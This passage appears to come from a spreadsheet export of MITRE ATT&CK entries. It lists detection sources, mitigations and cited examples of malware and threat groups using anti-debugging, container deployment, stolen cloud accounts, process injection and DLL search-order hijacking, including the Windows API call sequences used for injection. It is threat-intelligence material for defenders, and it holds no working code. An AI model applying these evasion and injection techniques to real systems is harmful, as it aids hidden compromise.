[DarkTortilla](https://attack.mitre.org/software/S1066) can detect debuggers by using functions such as `DebuggerIsAttached` and `DebuggerIsLogging`. [DarkTortilla](https://attack.mitre.org/software/S1066) can also detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.(Citation: Secureworks DarkTortilla Aug 2022)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can search for debugging tools on a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can check for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used `is_debugger_present` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses a function named &lt;code&gt;is_debugging&lt;/code&gt; to perform anti-debugging logic. The function invokes &lt;code&gt;sysctl&lt;/code&gt; checking the returned value of &lt;code&gt;P_TRACED&lt;/code&gt;. [ThiefQuest](https://attack.mitre.org/software/S0595) also calls &lt;code&gt;ptrace&lt;/code&gt; with the &lt;code&gt;PTRACE_DENY_ATTACH&lt;/code&gt; flag to prevent debugging.(Citation: wardle evilquest partii)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network.
Container Creation
Monitor for newly constructed containers that may deploy a container into an environment to facilitate execution or evade defenses.
Container Start
Monitor for activation or invocation of a container that may deploy a container into an environment to facilitate execution or evade defenses.
Pod Creation
Monitor for newly constructed pods that may deploy a container into an environment to facilitate execution or evade defenses.
Pod Modification
Monitor for changes made to pods for unexpected modifications to settings and/or control data that may deploy a container into an environment to facilitate execution or evade defenses.
Audit
Scan images before deployment, and block those that are not in compliance with security policies. In Kubernetes environments, the admission controller can be used to validate images after a container deployment request is authenticated but before the container is deployed.(Citation: Kubernetes Hardening Guide)
Limit Access to Resource Over Network
Limit communications with the container service to managed and secured channels, such as local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API, Kubernetes API Server, and container orchestration web applications.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access) In Kubernetes clusters deployed in cloud environments, use native cloud platform features to restrict the IP ranges that are permitted to access to API server.(Citation: Kubernetes Cloud Native Security) Where possible, consider enabling just-in-time (JIT) access to the Kubernetes API to place additional restrictions on access.(Citation: Microsoft AKS Azure AD 2023)
Network Segmentation
Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.
User Account Management
Enforce the principle of least privilege by limiting container dashboard access to only the necessary users. When using Kubernetes, avoid giving users wildcard permissions or adding users to the `system:masters` group, and use `RoleBindings` rather than `ClusterRoleBindings` to limit user privileges to specific namespaces.(Citation: Kubernetes RBAC)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed different types of containers into victim environments to facilitate execution.(Citation: Intezer TeamTNT September 2020)(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.(Citation: Cisco Talos Intelligence Group)
Doki
[Doki](https://attack.mitre.org/software/S0600) was run through a deployed container.(Citation: Intezer Doki July 20)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) was run through a deployed Ubuntu container.(Citation: Aqua Kinsing April 2020)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for suspicious account behavior across cloud services that share account. 
Logon Session Metadata
Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
User Account Authentication
Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account, account usage at atypical hours, or account authentication from unexpected locations or IP addresses. Service accounts should only be accessible from IP addresses from within the cloud environment.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) For example, in Azure AD environments, consider using Identity Protection to flag risky sign-ins based on location, device compliance, and other factors.
Account Use Policies
Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Active Directory Configuration
Disable legacy authentication, which does not support MFA, and require the use of modern authentication protocols instead. 
Multi-factor Authentication
Use multi-factor authentication for cloud accounts, especially privileged accounts. This can be implemented in a variety of forms (e.g. hardware, virtual, SMS), and can also be audited using administrative reporting features.(Citation: AWS - IAM Console Best Practices)
Password Policies
Ensure that cloud accounts, particularly privileged accounts, have complex, unique passwords across all systems on the network. Passwords and access keys should be rotated regularly. This limits the amount of time credentials can be used to access resources if a credential is compromised without your knowledge. Cloud service providers may track access key age to help audit and identify keys that may need to be rotated.(Citation: AWS - IAM Console Best Practices)
Privileged Account Management
Review privileged cloud account permission levels routinely to look for those that could allow an adversary to gain wide access, such as Global Administrator and Privileged Role Administrator in Azure AD.(Citation: TechNet Credential Theft)(Citation: TechNet Least Privilege)(Citation: Microsoft Azure security baseline for Azure Active Directory) These reviews should also check if new privileged cloud accounts have been created that were not authorized. For example, in Azure AD environments configure alerts to notify when accounts have gone many days without using privileged roles, as these roles may be able to be removed.(Citation: Microsoft Security Alerts for Azure AD Roles) Consider using temporary, just-in-time (JIT) privileged access to Azure AD resources rather than permanently assigning privileged roles.(Citation: Microsoft Azure security baseline for Azure Active Directory)
User Account Management
Periodically review user accounts and remove those that are inactive or unnecessary. Limit the ability for user accounts to create additional accounts.
User Training
Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) leveraged compromised credentials from victim users  to authenticate to Azure tenants.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used a compromised O365 administrator account to create a new Service Principal.(Citation: CrowdStrike StellarParticle January 2022)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has gained access to a global administrator account in Azure AD and has used `Service Principal` credentials in Exchange.(Citation: Mandiant APT29 Microsoft 365 2022)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used compromised Office 365 accounts in tandem with [Ruler](https://attack.mitre.org/software/S0358) in an attempt to gain control of endpoints.(Citation: Microsoft Holmium June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials to sign into victims’ Microsoft 365 accounts.(Citation: Microsoft NICKEL December 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials to access cloud assets within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) leverages valid cloud accounts to perform most of its operations.(Citation: GitHub Pacu)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations.(Citation: Peirates GitHub)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.(Citation: Roadtools)	
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;WriteProcessMemory()&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; with the parameter set to &lt;code&gt;ProcessBasicInformation&lt;/code&gt; may be used for this technique.(Citation: Lazarus APT January 2022)
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of behaviors related to process injection/memory tampering based on common sequences of indicators (ex: execution of specific API functions).
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has abused the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack process control flow and execute shellcode.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) has used the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack the execution flow of a process by replacing the &lt;code&gt;__fnDWORD&lt;/code&gt; function with the address of a created [Asynchronous Procedure Call](https://attack.mitre.org/techniques/T1055/004) stub routine.(Citation: FinFisher exposed )
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process Access
Monitor for processes being viewed that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.
Process Modification
Monitor for changes made to processes that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has injected code into target processes via thread local storage callbacks.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro PE_URSNIF.A2)(Citation: FireEye Ursnif Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor newly constructed .manifest and .local redirection files that do not correlate with software updates.
File Modification
Monitor for changed made to .manifest/.local redirection files, or file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious.
Module Load
Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths.
Audit
Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses.(Citation: Powersploit)
Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-by-side problems in software.(Citation: Microsoft Sxstrace)
Execution Prevention
Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application control solutions capable of blocking DLLs loaded by legitimate software.
Restrict Library Loading
Disallow loading of remote DLLs. This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+.
Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. &lt;code&gt;%SYSTEMROOT%&lt;/code&gt;)to be used before local directory DLLs (e.g. a user's home directory)
The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode&lt;/code&gt;(Citation: Microsoft More information about DLL)(Citation: Microsoft Dynamic Link Library Search Order)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used DLL search-order hijacking to load `exe`, `dll`, and `dat` files into memory.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has executed DLL search order hijacking.(Citation: ESET BackdoorDiplomacy Jun 2021)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.(Citation: ESET EvilNum July 2020) 
RTM
[RTM](https://attack.mitre.org/groups/G0048) has used search order hijacking to force TeamViewer to load a malicious DLL.(Citation: Group IB RTM August 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has performed DLL search order hijacking to execute their payload.(Citation: Nccgroup Emissary Panda May 2018)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) abuses a legitimate and signed Microsoft executable to launch a malicious DLL.(Citation: ESET Exchange Mar 2021)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has used search order hijacking to run the loader Vcrodat.(Citation: Symantec Whitefly March 2019)	
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used DLL search order hijacking.(Citation: PWC Cloud Hopper April 2017)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can launch itself via DLL Search Order Hijacking.(Citation: Securelist Brazilian Banking Malware July 2020)
BOOSTWRITE
[BOOSTWRITE](https://attack.mitre.org/software/S0415) has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.(Citation: FireEye FIN7 Oct 2019)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used search order hijacking to load a malicious payload DLL as a dependency to a benign application packaged in the same ISO.(Citation: Palo Alto Brute Ratel July 2022)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used search order hijacking to load a malicious DLL.(Citation: Cybereason Chaes Nov 2020)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.(Citation: ESET Crutch December 2020)
Downdelph
[Downdelph](https://attack.mitre.org/software/S0134) uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.(Citation: ESET Sednit Part 3)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit various DLL hijacking opportunities.(Citation: Github PowerShell Empire)
FinFisher
A [FinFisher](https://attack.mitre.org/software/S0182) variant uses DLL search order hijacking.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.(Citation: MSTIC FoggyWeb September 2021)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.(Citation: ZScaler Hacking Team)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load &lt;code&gt;oci.dll&lt;/code&gt; as a persistence mechanism.(Citation: FireEye Hikit Rootkit)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.(Citation: ESET InvisiMole June 2018)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can use DLL hijacking to bypass security controls.(Citation: Securelist Brazilian Banking Malware July 2020)
MirageFox
[MirageFox](https://attack.mitre.org/software/S0280) is likely loaded via DLL hijacking into a legitimate McAfee binary.(Citation: APT15 Intezer June 2018)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has the ability to use DLL search order hijacking for installation on targeted systems.(Citation: Proofpoint TA416 Europe March 2022)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.(Citation: ESET Operation Groundbait)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)	
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) is launched through use of DLL search order hijacking to load a malicious dll.(Citation: FireEye APT10 April 2017)
WEBC2
Variants of [WEBC2](https://attack.mitre.org/software/S0109) achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).(Citation: Mandiant APT1 Appendix)
WastedLocker
 [WastedLocker](https://attack.mitre.org/software/S0612) has performed DLL hijacking before execution.(Citation: NCC Group WastedLocker June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
File Modification
Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017) Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)
Process Access
Monitor for processes being viewed that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
Process Metadata
Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)
Process Modification
Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. For example, on Windows 10, Attack Surface Reduction (ASR) rules may prevent Office applications from code injection. (Citation: win10_asr)
Privileged Account Management
Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) loaded [BlackEnergy](https://attack.mitre.org/software/S0089) into svchost.exe, which then launched iexplore.exe for their C2. (Citation: Booz Allen Hamilton)
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.(Citation: Threatpost New Op Sharpshooter Data March 2019)    
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors injected code into a selected process, which in turn launches a command as a child process of the original.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) malware has injected a Cobalt Strike beacon into Rundll32.exe.(Citation: Cybereason Cobalt Kitty 2017)
APT37
[APT37](https://attack.mitre.org/groups/G0067) injects its malware variant, [ROKRAT](https://attack.mitre.org/software/S0240), into the cmd.exe process.(Citation: Talos Group123)
APT41
[APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has injected code into trusted processes.(Citation: Group IB Cobalt Aug 2017)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Win7Elevate to inject malicious code into explorer.exe.(Citation: Securelist Kimsuky Sept 2013)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has used various methods of process injection including hot patching.(Citation: Microsoft PLATINUM April 2016)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has injected a DLL library containing a Trojan into the fwmain32.exe process.(Citation: Group IB Silence Sept 2018)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has injected malicious code into legitimate .NET related processes including  regsvcs.exe, msbuild.exe, and installutil.exe.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has also used [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-ReflectivePEInjection.ps1&lt;/code&gt; to reflectively load a PowerShell payload into a random process on the victim system.(Citation: ESET Turla PowerShell May 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used process injection to execute payloads to escalate privileges.(Citation: Mandiant FIN12 Oct 2021)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) can inject into the `wuauclt.exe` process to perform C2 actions.(Citation: Mandiant Suspected Turla Campaign February 2023)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can inject into known, vulnerable binaries on targeted hosts.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can inject code from files to other running processes.(Citation: TrendMicro Lazarus Nov 2018)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) injects itself into explorer.exe.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can inject code through calling &lt;code&gt;VirtualAllocExNuma&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can inject code into multiple processes on infected endpoints.(Citation: Cybereason Bumblebee August 2022)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) injects into a newly spawned process created from a native Windows executable.(Citation: PaloAlto CardinalRat Apr 2017)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can inject into the `svchost.exe` process for execution.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can inject a variety of payloads into processes dynamically chosen by the adversary.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) can inject a payload into the memory of a compromised host.(Citation: BlackBerry CostaRicto November 2020)
Donut
[Donut](https://attack.mitre.org/software/S0695) includes a subproject &lt;code&gt;DonutTest&lt;/code&gt; to inject shellcode into a target process.(Citation: Donut Github)	
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can inject its payload into iexplore.exe process.(Citation: Cyble Egregor Oct 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: Github PowerShell Empire)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) injects its communication module into an Internet accessible process through which it performs C2.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has the ability to inject shellcode into a donor processes that is started in a suspended state. [GuLoader](https://attack.mitre.org/software/S0561) has previously used RegAsm as a donor process.(Citation: Medium Eli Salem GuLoader April 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has injected into running processes.(Citation: US-CERT HOPLIGHT Apr 2019)	
HTRAN
[HTRAN](https://attack.mitre.org/software/S0040) can inject into into running processes.(Citation: NCSC Joint Report Public Tools)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) can run shellcode it injects into a newly created process.(Citation: Unit42 Emissary Panda May 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.(Citation: Unit 42 IronNetInjector February 2021 )
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) performs code injection injecting its own functions to browser processes.(Citation: F-Secure Sofacy 2015)(Citation: Unit 42 Sofacy Feb 2018)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can inject content into lsass.exe to load a module.(Citation: Microsoft PLATINUM April 2016)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can migrate the loader into another process.(Citation: BiZone Lizar May 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has been injected directly into a running process, including `explorer.exe`.(Citation: Cylance Dust Storm)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.(Citation: Red Canary NETWIRE January 2020)
NavRAT
[NavRAT](https://attack.mitre.org/software/S0247) copies itself into a running Internet Explorer process to evade detection.(Citation: Talos NavRAT May 2018)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can start and inject code into a new `svchost` process.(Citation: Trend Micro Iron Tiger April 2021)
PcShare
The [PcShare](https://attack.mitre.org/software/S1050) payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.(Citation: Bitdefender FunnyDream Campaign November 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: GitHub PoshC2)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can inject itself into processes including explore.exe, Iexplore.exe, Mobsync.exe., and wermgr.exe.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
REvil
[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.(Citation: Malwarebytes RokRAT VBA January 2021)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) has a command to hide itself through injecting into another process.(Citation: Fortinet Remcos Feb 2017)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can inject shellcode directly into Excel.exe or a specific process.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can inject into running processes on a compromised host.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has injected an install module into a newly created process.(Citation: Kaspersky ShadowPad Aug 2017)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can inject code into local and remote processes.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) injects into the Internet Explorer process.(Citation: Talos Smoke Loader July 2018)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has relied on injecting its payload directly into the process memory of the victim's preferred browser.(Citation: Kaspersky StoneDrill 2017)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;Nt*&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) functions to inject code into legitimate processes such as &lt;code&gt;wermgr.exe&lt;/code&gt;.(Citation: Joe Sec Trickbot)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to inject malicious DLLs into a specific process for privilege escalation.(Citation: Check Point Warzone Feb 2020)
Waterbear
